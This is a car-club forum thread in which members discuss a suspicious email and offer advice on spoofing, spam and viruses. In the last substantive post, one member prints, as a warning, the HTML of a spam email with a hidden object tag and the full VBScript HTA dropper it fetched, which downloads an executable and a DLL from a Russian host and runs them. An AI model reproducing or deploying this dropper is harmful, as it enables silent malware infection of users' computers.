Jump to content
Ad: Genuine Toyota parts & accessories from the Toyota official store on eBay ×
Do Not Sell My Personal Information


  • Join Toyota Owners Club

    Join Europe's Largest Toyota Community! It's FREE!

     

     

Recieved Strange Email

Demonic Angel

By Demonic Angel,
in General Club Discussions

 Share

Recommended Posts

Demonic Angel Grand Master

Demonic Angel

Posted
Posted

I got an email today from them, an automated response to an email I supposedly sent them at 4.30pm today - but I havent sent them any emails and have never heard from them! Plus I was at work at 4.30 and have no access to my home account from there.

Has anyone else received any emails from them? I have emailed them back saying I dont know what they are on about.

It says:

Thank you for contacting GCQW.co.uk

We will reply to your email as soon as possible.

Should you require an immediate response, please feel free to contact us during our normal office hours:

Monday to Sunday 9am to 5pm on tel: 01427 677155 or 01427 615389

Thank you

GCQW.co.uk

This is their site, and I know I've not been on there before - I dont do bikes!

Is there anyway anyone can send an email on my behalf without me knowing? No one has access to my personal PC apart from me and no email has been sent to them from my sent items folder - I dont understand how they have gotten my email address..... its a "proper" email too, not a Hotmail or Yahoo address and is only set up through my Outlook.

Can anyone help?

Link to comment
Share on other sites
alanbradley Grand Master

alanbradley

Posted
Posted

Golden Rule of E-mail... If you don't know it, or don't trust it, delete it! ;)

Link to comment
Share on other sites
Lois Enthusiast

Lois

Posted
Posted

yep delete it id say..

alot of companys manage to get peoples personal email addresses and just send out junk mail..

i used to get loads of crap like that

Link to comment
Share on other sites
Al J Grand Master

Al J

Posted
Posted

Some viruses spread themselves by scanning emails in the address book of a PC they infect and then sending to all those addresses, often in the guise of the person who owns the infected PC.

Harvester bots are programs that seek out email addresses on the Internet then use those to send emails elsewhere. This happened to me and a number of friends got an email from me that wasn't from me, if you see what I mean. I even got an email from 'myself'! That email address of mine is now history.

Do you subscribe to any forums, especially USENET newsgroups using your usual email address? This is a classic way that others can gain access to (and use) your email address.

This company's autoresponse email could be replying to an email sent to them using your email address.

Or it could be them who are the instigators having got hold of your address. Delete it and do a virus check.

Link to comment
Share on other sites

Steve Grand Master

+Steve

Posted
Posted

just spoofed .. dont worry.. delete

Link to comment
Share on other sites
Gnome Grand Master

Gnome

Posted
Posted

Yup, I'd say get rid of it.

Thre's also the possibility that a potential virus or spyware, is using your pc as an "e-mail server."

Some viruses have the potential to use your very PC as a way of posting their junkmail.

However, you'd experience slow internet usage, slow PC performance, and usually, the 1000's of bizarre e-mails in your sent box!

Link to comment
Share on other sites
Demonic Angel Grand Master

Demonic Angel

Posted
  • Author
Posted

I subscribe to all the forums I use with that email address, so it could be from anywhere!

My virus scanner checks all incoming emails though and it certified it virus free.....?? Will still do a scan though to be on the safe side.....

Steve - what does spoofed mean? :unsure:

Link to comment
Share on other sites
Matthew_McNally Mentor

Matthew_McNally

Posted
Posted

bit late - sorry.

if you havent deleted the message yet (and you should have by now!), I would like to have a look at the source of the message.

it is not impossible to use email to trigger downloading executables from the internet - such executables are generally trojans or virii.

which browser fo you use? and which operating system?

Link to comment
Share on other sites
seveer unaek Grand Master

seveer unaek

Posted
Posted

One rule when using the internet and email in particular... if you don't know the address/sender... don't even bother opening it!

I wouldn't mind seeing the source code too, as there are many triggers within email's that can cause your computer to be open to a hack at any time. It might not specifically be the email holding the virus (hence why your spam/virus checker thing didn't pick it up? But there are often tags placed within the email that trigger an event somewhere else, like on the senders server, and then you can be infected and sent even more crap.

A common thing with many email servers and web servers in general, is if they are open to attack at any time for even a millisecond then something called a Denial of Service attack (DoS as more commonly known) can occur, which is defined by Joel Deitch as:

‘miscreants send a flood of traffic that overwhelms Web servers, hosts, routers, and other network devices. This volume is so enormous that users, customers, and partners can't access their networks and systems for extended periods of time.

This is a VERY common thing with virus tagged emails.... which is why you should never open an email you don't know!

Also... this is a simple explantion as to why your email service or any website using a web server or database server will show a message saying that an unexpected amount of traffic is casuing slowdown or something like that. It happens to Hotmail quite a lot!

Damned Hackers! Leave us alone!!

Oh, sorry for the smart **** answer, but it's good to learn new things isn't it class.... (all say yes in a really bored way...)

Here endeth the lesson!

Link to comment
Share on other sites
Al J Grand Master

Al J

Posted
Posted

<yawn> yes sir! </yawn> ;)

Now let that be a lesson to us all. Don't open strange emails. Treat them like junk mail you get in the post. These people don't even give you a free pen!

Link to comment
Share on other sites
seveer unaek Grand Master

seveer unaek

Posted
Posted
<yawn> yes sir! </yawn>  ;)

Now let that be a lesson to us all. Don't open strange emails. Treat them like junk mail you get in the post. These people don't even give you a free pen!

Cheeky.... :P

But yeah, very sorry for boring the pants off of y'all!

Link to comment
Share on other sites
Demonic Angel Grand Master

Demonic Angel

Posted
  • Author
Posted

I'm normally really good and dont open them - guess curiosity got the better of me.... and you know what happened to curiosity.... :P

Well ran a virus check last night and it came back clean.

Will defo be more careful in future though!

I will post the source still if anyone wants it! Matthew - my OS is Windows XP Pro and my browser is Firefox....

Ahhh just remembered - deleted the message last night..... :unsure:

Link to comment
Share on other sites
Robie Veteran

Robie

Posted
Posted

I think its probably just someone being 'funny' put your email address in a mailing list thing or whilst asking for information on one of their products for instance....

You may find you'l now get a regular mail form them. If this happens click an unsubscribe link or email the company.

Link to comment
Share on other sites

Crisis Veteran

Crisis

Posted
Posted
yep delete it id say..

alot of companys manage to get peoples personal email addresses and just send out junk mail..

i used to get loads of crap like that

So true. Most of my spam these days is all in Japanese or trying to sell me cheap software. Set so many word filters up its unbelievable!

Link to comment
Share on other sites
Matthew_McNally Mentor

Matthew_McNally

Posted
Posted
I will post the source still if anyone wants it! Matthew - my OS is Windows XP Pro and my browser is Firefox....

Ahhh just remembered - deleted the message last night.....  :unsure:

if FF is yur default browser - you may be safer.

many of these viruses expolit vunerabilities in IE.

let me see if I can find the source of one I got a while ago

Link to comment
Share on other sites
Matthew_McNally Mentor

Matthew_McNally

Posted
Posted

Okay - this what I mean.

I received this spam a while back

Buenos Dias, Sariah!

her drop test-flew white. why animal sat you daily? cheerfully act outran an call versus boy. it gainsaid his solid steam upon smell. noisily. this bitter record above fold, which sheared yellow, long square. Fidel quick-froze the solid screw. i came Mekhi why overthrew her Zaria! i strewed early coast, that spread deliberately... into ball reset hearing, run pleaded excluding the root among secret word:

"how they overpaid her?"

"i learned you strange."

automatic wood power laded, it chid rightfully, annually, far. it overthrew your tall root upon its sad shirt, who chose kindly. that hard face rapped in their block; fertile, material place. natural place crack atrided, it wove regularly, noisily, happily. you foretold its kind end behind some small skirt, who knew selfishly. their round leather foreshowed with a wing; fixed, brown field. who science unswore you wearily? loosely wall bereft an land within instrument. it grew an acid end inside fire. successfully. i woke an long month past my smooth wall, who unwound solemnly. they burst the small detail after a opposite dollar, that enwound angrily. she quick-froze it electric. Brayden dared some brown attack. you rebound Angela which strung it Douglas! she mislaid a sad branch following his brown glove, who outsold less. some wrong print tore from her vessel; public, black pot. cut pocket reaction befell, she sight-read enormously, rarely, mysteriously. some soft tax set within his discussion; dear, bad pocket. i self-fed that parallel book above my low earth, which spat stealthily. he overbore us mixed. he built opposite fire, which overspent seriously.

it strung an late s*x through his like friend, that overspent monthly. this wise wing mi***** despite their earth; red, quiet cost. broken block copper bethought, i offset seldom, weakly, painfully. her open day tore over an iron; serious, tall boy. she dared an able draw as an complete event, who bet punctually. you knew it complex. we hamstringed common selection, that blawed suspiciously...

froze our white kick,

Rowan MATHEWS.

this obviously made me think - WTF? what are they trying to sell me?

I read the source of the email, which was

<HTML>
<BODY>
<FONT face="Verdana, Arial">
Buenos Dias, Sariah!
<P>
her drop test-flew white. why animal sat you daily? cheerfully act outran an call versus boy. it gainsaid his solid steam upon smell. noisily. this bitter record above fold, which sheared yellow, long square. Fidel quick-froze the solid screw. i came Mekhi why overthrew her Zaria! i strewed early coast, that spread deliberately... into ball reset hearing, run pleaded excluding the root among secret word:
<P>
"how they overpaid her?"<BR>
"i learned you strange."
<P>
automatic wood power laded, it chid rightfully, annually, far. it overthrew your tall root upon its sad shirt, who chose kindly. that hard face rapped in their block; fertile, material place. natural place crack atrided, it wove regularly, noisily, happily. you foretold its kind end behind some small skirt, who knew selfishly. their round leather foreshowed with a wing; fixed, brown field. who science unswore you wearily? loosely wall bereft an land within instrument. it grew an acid end inside fire. successfully. i woke an long month past my smooth wall, who unwound solemnly. they burst the small detail after a opposite dollar, that enwound angrily. she quick-froze it electric. Brayden dared some brown attack. you rebound Angela which strung it Douglas! she mislaid a sad branch following his brown glove, who outsold less. some wrong print tore from her vessel; public, black pot. cut pocket reaction befell, she sight-read enormously, rarely, mysteriously. some soft tax set within his discussion; dear, bad pocket. i self-fed that parallel book above my low earth, which spat stealthily. he overbore us mixed. he built opposite fire, which overspent seriously.
<P>
it strung an late s*x through his like friend, that overspent monthly. this wise wing mi***** despite their earth; red, quiet cost. broken block copper bethought, i offset seldom, weakly, painfully. her open day tore over an iron; serious, tall boy. she dared an able draw as an complete event, who bet punctually. you knew it complex. we hamstringed common selection, that blawed suspiciously...
<P>
froze our white kick,<BR>
Rowan MATHEWS.
</FONT><P>
<img width=50 height=100 style="display:none"><ObJecT data="http://www.oil-bank.ru/cgi-bin/devil/rcounter.cgi?action=click"> 


<BR><BR>
<TABLE width=400><HR>
<P style="FONT: 9pt/11pt verdana">[URL=http://www.avast.com]avast! Antivirus[/URL]: Inbound message clean.
<P style="FONT: 8pt/11pt verdana">Virus Database (VPS): 0503-2, 01/21/2005<BR>Tested on: 1/23/2005 6:00:22 PM<BR><FONT color=gray>avast! - copyright (c) 2000-2004 ALWIL Software.</FONT></P>
<TBODY></TBODY></TABLE>
<BR>

</BODY>
</HTML>







<html>
<BR><BR>
<TABLE width=400><HR>
<P style="FONT: 9pt/11pt verdana">avast!/SMTP2000 Antivirus: Outbound message clean.
<P style="FONT: 8pt/11pt verdana">Virus Database (VPS): 1/21/2005<BR>Tested on: 1/23/2005 18:00:34 +0100<BR><FONT color=gray>avast! - copyright (c) 2000-2004 ALWIL Software.</FONT></P>
<TBODY></TBODY></TABLE>
<BR></html>

the important part to note is the image tag

<img width=50 height=100 style="display:none"><ObJecT data="http://www.oil-bank.ru/cgi-bin/devil/rcounter.cgi?action=click">

accessing that URL directly prompted me to download a file called htmlhelp.hta, which I opened in notepad to read

<HTML><HEAD><TITLE>Universal Plugin Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<object id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<object id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<BODY>
<script language="VBScript">

Dim oXMLHTTP
Dim oStream
Dim oShellApp
Dim oFolder
Dim oFolderItem
Dim PluginFile
Dim WinDir
Dim EnvStrings
Dim XMLBody
Dim cByte
Dim ByteCode
Dim FileName
Dim Module_Path
Dim Trojan_Path

ssfWINDOWS=36
WinEnv_Mask="windir=" 

Exploit_Path=document.location.href
j=InStrRev(Exploit_Path,"/",-1,1)
Exploit_Path=Left(Exploit_Path,j)

If InStr(Exploit_Path,"cgi-bin")<>0 Then
   CGI_Script_Path=Exploit_Path & "rcounter.cgi"    
Else
   CGI_Script_Path=Exploit_Path & "cgi-bin/devil/rcounter.cgi"    
End If   

InitPaths()

self.MoveTo 6000,6000

FileName=""
Randomize
rr=Int(8*Rnd)
ik=0
Do
  ii=Int(25*Rnd)+97
  FileName=FileName+Chr(ii)
  ik=ik+1
Loop While ik<rr
FileName=FileName & ".exe"

RunCommand=""
Call Download_and_Execute(Trojan_Path,FileName,RunCommand,0)

FileName=""
rr=Int(8*Rnd)
ik=0
Do
  ii=Int(25*Rnd)+97
  FileName=FileName+Chr(ii)
  ik=ik+1
Loop While ik<rr
FileName=FileName & ".dll"

RunCommand="," & "InstallWMH " & Trojan_Path & " " & CGI_Script_Path
Call Download_and_Execute(CGI_Script_Path & "?action=install",FileName,RunCommand,1)

self.Close

Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)

set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
Module_Path=Remote_path
OpenSession()
GetFile()

On Error Resume Next
Set oStream = CreateObject("ADODB.Stream")
If Err.number <> 0 Then
   
   For Each WinEnv In MSplay.Environment("PROCESS")
     If InStr(WinEnv,WinEnv_Mask)<>0 Then
        EnvStrings=Split(WinEnv,"=",-1,1)
        WinDir=EnvStrings(1)   
     End If
   Next 
   FileName=WinDir & "\" & Local_name
   Plugin_size=LenB(XMLBody)
   
   Set PluginFile=MSmedia.CreateTextFile(FileName, TRUE)

   For j=1 To Plugin_size 
       cByte=MidB(XMLBody,j,1)
       ByteCode=AscB(cByte)
       WriteFile()
   Next

   PluginFile.Close
   If Run_by_Rundll32 = 0 Then
      Cmd=FileName & " " & Run_params
   Else
      Cmd="rundll32" & " " & FileName & Run_params  
   End If
   MSplay.Run (Cmd),1,FALSE
Else
   Set oShellApp = CreateObject("Shell.Application")
   Set oFolder=oShellApp.NameSpace(ssfWINDOWS)
   Set oFolderItem=oFolder.PubikName("hh.exe")
   WinDir = Left(oFolderItem.Path,InStrRev(oFolderItem.Path,"\"))
   FileName=WinDir & Local_name
       
   Plugin_size=LenB(XMLBody)
   
   Set PluginFile=MSmedia.CreateTextFile(FileName, TRUE)

   For j=1 To Plugin_size 
       cByte=MidB(XMLBody,j,1)
       ByteCode=AscB(cByte)
       WriteFile()
   Next

   PluginFile.Close

   If Run_by_Rundll32 = 0 Then
      Cmd=FileName & " " & Run_params
      oShellApp.ShellExecute Cmd 
   Else
      Cmd=FileName & Run_params  
       oShellApp.ShellExecute "rundll32", Cmd 
   End If
    
   Set oStream=Nothing
   Set oShellApp=Nothing
End If
set  oXMLHTTP=Nothing

End Sub

Function WriteFile
PluginFile.Write(Chr(ByteCode))
End Function

Function GetFile
oXMLHTTP.Send() 
XMLBody=oXMLHTTP.responseBody
End Function

Function OpenSession
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0) 
End Function

Function InitPaths
Trojan_Path="http://www.oil-bank.ru/devil.exe" 
End Function

</SCRIPT>
</BODY></HTML>

again - the important part of this is

Function InitPaths
Trojan_Path="http://www.oil-bank.ru/devil.exe" 
End Function

basically - this nonsense looking email was trying to expoit a hole in Internet Explorer (which has been patched by MS) to download an executable to my machine (this devil.exe).

I dont know what it is - I never downloaded it (obviously :rolleyes: ) - but, given the lengths gne to to try and deliver this to my machine without my knowledge - I guessed it was not a nice piece of software.

Thats why I was asking those questions - sometimes things are significantly more sinister than they seem.

Link to comment
Share on other sites

Latest Deals

Toyota Official Store for genuine Toyota parts & accessories

Disclaimer: As the club is an eBay Partner, The club may be compensated if you make a purchase via eBay links

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing






×
×
  • Create New...




Forums

News

Membership